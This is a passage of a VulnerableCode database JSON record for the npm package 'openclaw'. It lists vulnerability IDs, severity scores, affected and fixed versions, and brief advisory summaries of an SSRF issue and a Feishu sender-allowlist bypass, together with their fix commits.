-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerabil
ity":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerabil
ity":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerabil
ity":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerabil
ity":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-4w7m-58cg-cmff"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xpnh-32hh-p7fb"},{"url":"http://p
ublic2.vulnerablecode.io/api/vulnerabilities/91330?format=json","vulnerability_id":"VCID-xpr3-hg3h-z3bz","summary":"OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n## Summary\n\nSSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSeveral channel extensions still used raw `fetch()` against configured base URLs without the SSRF guard that was added for CVE-2026-28476. Commit `f92c92515bd439a71bd03eb1bc969c1964f17acf` routes those outbound requests through `fetchWithSsrFGuard` so configured endpoints cannot be rebound to blocked internal destinations.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f92c92515bd439a71bd03eb1bc969c1964f17acf`.\n\n## Fix Commit(s)\n\n- 
`f92c92515bd439a71bd03eb1bc969c1964f17acf`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35629","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14495","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14536","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14532","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35629"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"}],"url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":
""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:32Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"},{"reference_url":"https://github.com/advisories/GHSA-pg2v-8xwh-qhcc","reference_id":"GHSA-pg2v-8xwh-qhcc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pg2v-8xwh-qhcc"},{"reference_url":"https://github.com/advisories/GHSA-rhfg-j8jq-7v2h","reference_id":"GHSA-rhfg-j8jq-7v2h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rhfg-j8jq-7v2h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability
":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability
":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability
":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packa
ges/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35629","GHSA-rhfg-j8jq-7v2h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xpr3-hg3h-z3bz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89514?format=json","vulnerability_id":"VCID-xryt-a83q-q7et","summary":"OpenClaw: Feishu thread history and quoted messages bypass sender allowlist\n## Summary\nFeishu thread history and quoted messages bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Feishu because fetched quoted/root/thread context bypasses sender allowlists, and SECURITY.md does not exempt remote sender-allowlist bypasses.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `f45e5a6569aab1d58cc6de25b19f1dc4c8779b85` — 2026-03-31T19:43:54+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41406","reference_id":"","reference_type":"","scores":[{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14323","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.1436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14358","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41406"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f45e5a6569aab1d58cc6de25b19f1dc4c8779b85"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_
elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-877v-w3f5-3pcq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41406","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":